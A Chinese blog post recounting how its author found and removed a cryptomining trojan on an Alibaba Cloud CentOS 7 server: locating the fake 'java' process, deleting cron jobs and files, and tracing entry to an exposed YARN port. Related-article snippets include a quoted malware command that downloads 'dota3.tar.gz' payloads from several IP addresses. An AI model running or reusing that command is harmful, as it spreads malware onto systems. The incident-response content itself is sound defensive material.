六、关于阿里云CentOS7被挖矿木马程序入侵的解决办法

最新推荐文章于 2025-05-26 16:43:50 发布
原创 最新推荐文章于 2025-05-26 16:43:50 发布 · 4.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Linux挖矿木马 #CentOS被挖矿木马入侵 #阿里云挖矿木马

本文分享了一次服务器遭遇挖矿木马攻击的经历,详细记录了从发现异常CPU占用,到定位并清除木马的过程。作者通过使用top命令发现可疑进程,进一步查明为非法下载的挖矿程序,并采取措施阻止其运行,包括调整文件权限、终止木马进程、清理执行计划及删除恶意文件。此外,还揭示了攻击者通过YARN端口8088渗透的细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看进程:top

在这里插入图片描述
发现一个command为java的程序一直在偷吃我的cpu,逗我玩,我的java怎么可能会偷吃,一开始还真以为是java文件

查看进程命令:top c

在这里插入图片描述
一看,是一个在/var/tmp/java下的文件,阿里云的态势检测有一个非法下载异常和一个挖矿木马程序
在这里插入图片描述
11.09分被非法下载下载下来的,11分被执行,短信就过来了,不用看了就这家伙,谁知打开一看,乱码,不慌,先把起权限降为只读。
先把木马进程杀掉和所有执行计划停止掉(或删除掉)
service stop crond 或 crontab -r 删除所有的执行计划
在这里插入图片描述
我一不小心就把执行计划删除掉了,不过删除前我已经把这个计划文件找到了在:/var/spool/cron下,最可恶的是,文件还伪装成我的用户名"ljj",一眼看过去就知道不是我,我们不一样。
打开名为ljj的文件:
在这里插入图片描述
把标准输出流放到回收站中,标准错误流放到标准输出流中,也跟着进了回收站/dev/null,因此没有错误消息显示出来。
顺便回头把/var/tmp下假java文件也删掉。

最后提一下,我是被入侵yarn的端口8088,可以通过相关端口进入管理页面查看发现有一堆正在执行的任务,注意做好相关措施,防止匿名用户登录。

记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(挖矿入侵应急响应)
墨痕诉清风的博客
11-18 2727
记一次阿里云服务器被被种挖矿程序解决的过程。
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵
墨痕诉清风的博客
05-15 7645
阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
清理linux上c3pool挖矿病毒xmrig
sulei627719296的博客
04-25 1932
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除。检查是否有相关的定时任务,如果有定时任务则删除掉。找到所有相关的服务,全部删除。
Linuxcentos7)常见安全、挖矿问题
weixin_41421314的博客
04-23 1444
centos安全配置、解决挖矿问题
清理阿里云服务器上 linux上c3pool挖矿病毒xmrig
最新发布
weixin_72244090的博客
05-26 262
清理挖矿病毒操作步骤:1.停止并禁用ddaemon和c3pool_miner服务;2.解除文件锁定属性;3.删除相关服务文件和目录;4.清理残留的挖矿程序文件;5.重载系统服务配置。操作涉及关键系统文件删除,需谨慎执行。
centos7系统被入侵,挂载挖矿木马-pamdicks-(1)临时处理
ntgengyf的博客
07-25 815
根据隐藏进程以及隐藏文件不可见的特性,进行搜索分析,得出系统内核被篡改,将文件名称和进程信息给屏蔽。以后得加强注意这三方面的安全问题,本次木马程序并未涉及文件防篡改配置,不然也只能重装系统进行处理了。开发使用过程中,发现经常有服务无故关闭,登录服务器经检查,发现CPU使用率达到100%。删除原文件,并创建一个顶包空文件,然后使用系统chattr对其进行锁定禁止修改。及文件删除,但是重启后又自行恢复,还有其他机器,也经过一夜,死灰复燃了。用户直接启动,导致内核被修改,问题难度复杂化。
记录一次处理centos7服务器被植入Xmrig挖矿病毒问题
qq810908892的博客
05-19 1323
现象CPU占用100%,内存占用不大,top命令没有占用CPU很大的进程,有个名称为xmrig,但占用CPU很小 安装unhide软件,并使用unhide proc命令,查找出隐藏进程,查出很多进程 kill 任意一个进程,CPU马上降至个位数,但重启服务器之后,又到100%,猜测被注册为系统服务了 第二步查出很多进程,但是他们的command、执行路径等都一样,一般第一个为主进程 systemctl status 主进程ID,查出是哪个系统服务,kill -9主进程ID,删除服务
centos 系统服务器被黑客攻击怎么办?
求是
03-05 1759
1.先把sshd登录这块给他搞定 #!/bin/bash rm -rf /home/shell/ip_list cat /var/log/secure | grep "Failed password for" | awk '{print$(NF-3)}' | sort | uniq -c > /home/shell/ip_list #cat /var/log/secure | grep...
centos服务器中木马后的处理和预防
高飞的专栏
07-11 3141
木马的迹象 如果你的服务器出现以下迹象,比如ssh连接登录后输入命令很慢,或者是请求服务器上的后端服务变得很卡,这时候就可以用top命令看一下服务器上进程的资源占用,如果有异常占用资源特别高的进程(像是挖矿类的木马,可能进程的CPU占用能到99%),那服务器大概率就是中木马了。 发现异常后的处理 常见的处理方式 主要可以参考以下文章里的方式: linux系统入侵排查以及木马清除 一次Linux...
阿里云CPU占用率90%被植入挖矿木马的解决方法
qq_35692642的博客
03-14 5159
目录问题总结 问题 最近几日突然发现服务器CPU占用率满了 我一开始还没在意,但是当打开警告内容的时候心脏骤停 查了一下,发现应该是被别人植入木马挖矿了,使用top命令看了一下CPU占用,发现有个python进程cpu占用率直接拉满,而且总是定时启动,没法直接使用kill杀死进程 使用 vim /var/log/cron 查看了一下计划任务,果然不对劲 但是使用crontab -l查看,什么也没有 网上查了一下,发现可能是木马可能是从6379端口进来的,使用lsof -i:6379看了一下,几百
阿里云服务器遭受挖矿程序的入侵的清理之战
qq_38685242的博客
07-26 2829
最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7
阿里云:2025年操作系统停服应用指南报告.pdf
03-04
一个电商公司因为未及时修补该漏洞,攻击者利用漏洞在服务器上植入挖矿木马,导致服务器的CPU资源被占用90%,数据库连接出现异常,最终使得订单支付系统崩溃8小时,造成直接损失200万元。 二、操作系统停服应对方案...
阿里云服务器centos7挖矿病毒处理
08-05 3429
阿里云】尊敬的1*********6:云盾云安全中心检测到您的服务器:1xx.xx.xx.x5(gateway)出现了紧急安全事件:主动连接恶意下载源,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1.gYVW7 进行处理 。云安全中心提供企业版7天免费试用,您可以开通试用查看更多信息。如果您在处理过程中遇到问题,可以咨询阿里云官方电话95187-1 处理过程: 1、查找异常进程,确定病毒进程,定位病毒脚本的执行用户 2、杀掉病毒进程,注意要检查清楚,病...
CentOS7 下处理挖矿僵尸网络dota3木马攻击
u013308762的博客
08-11 957
转载自:https://mip.yht7.com/news/88716 先登录阿里云后台,查看安全中心的告警祥情,发现有几条记录: 父进程路径:/usr/bin/bash 父进程命令行:sh -c ./tddwrt7s.sh “http://67.205.135.65/dota3.tar.gz” “http://91.121.51.120/dota3.tar.gz” “http://51.75.28.134/dota3.tar.gz” “http://159.203.17.176/dota3.tar.gz”
解决centos服务器遭黑客安装挖矿木马导致kswapd0进程使用的cpu过高问题
皓亮君的博客
03-07 2955
文章目录简介1.查看kswapd0进程使用的PID2.查看进程的工作空间3.切换到木马程序目录并删除4.清理定时任务5.查看所有用户的定时任务6.清理看kswapd0进程7.修改服务器密码8.总结 简介 最近发现服务器特别卡,然后发现kswapd0占用的cpu高达800%,上网科普下kswapd0进程,kswapd0占用CPU时, 说明机器的全部内存(物理内存+虚拟内存)已经用尽了,机器不得不把内存里的内容卸载到硬盘, 然后才能加载所要的程序 但是我查看下top发现服务器的内存还有10个G没使用,查阅一些文
centos 处理挖矿病毒
weixin_44606690的博客
01-04 884
处理挖矿病毒,真的恶心啊占用CPU百分之50
阿里云centos7 服务器XorDDoS木马查杀
07-09 4684
一、问题描述2018年6月份,阿里云搞活动大促销,本人花了298元购买了一台阿里云centos 服务器(3年),期间部署了反向代理软件frpc,用来打通内网WEB服务等场景的应用,期间没做什么特别的防护设置,6月下旬以来,邮箱一直提示: 通过阿里云管理控制台查看,服务器被IP107.179.35.251(美国加利福尼亚州)SSH暴力破解了,并且存在异常的远程登录记录。二、异常现象初定位通过Xshe...
centos kswapd0 挖矿木马病毒进程CPU100解决
1193379199的博客
01-20 1439
很多病毒都是有会在定时任务里面,以至于很难清理清楚。(由于我的服务器买油开启定时任务服务,所以里面没有任务)2.1 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息。主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程。最好把木马程序和定时任务都清理完了再杀掉,要不然还会自动重启。1.在系统里面top一下,查看了所有进程。2.排查kswapd0进程。7.杀掉kswapd0进程。4.查看进程的工作空间。
记录一次被挖矿木马攻击的处理过程
天涯哥的博客
11-27 587
记录一次解决centos服务器被挖矿木马攻击,导致系统变慢的问题
阿里云CentOS7快速部署Nginx指南
"阿里云CentOS7上安装和启动Nginx的详细步骤" 在本文中,我们将详细介绍如何在阿里云CentOS 7.6 64位操作系统上安装和配置Nginx Web服务器。首先,确保你通过ECS管理控制台的Workbench远程连接到了你的云服务器。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值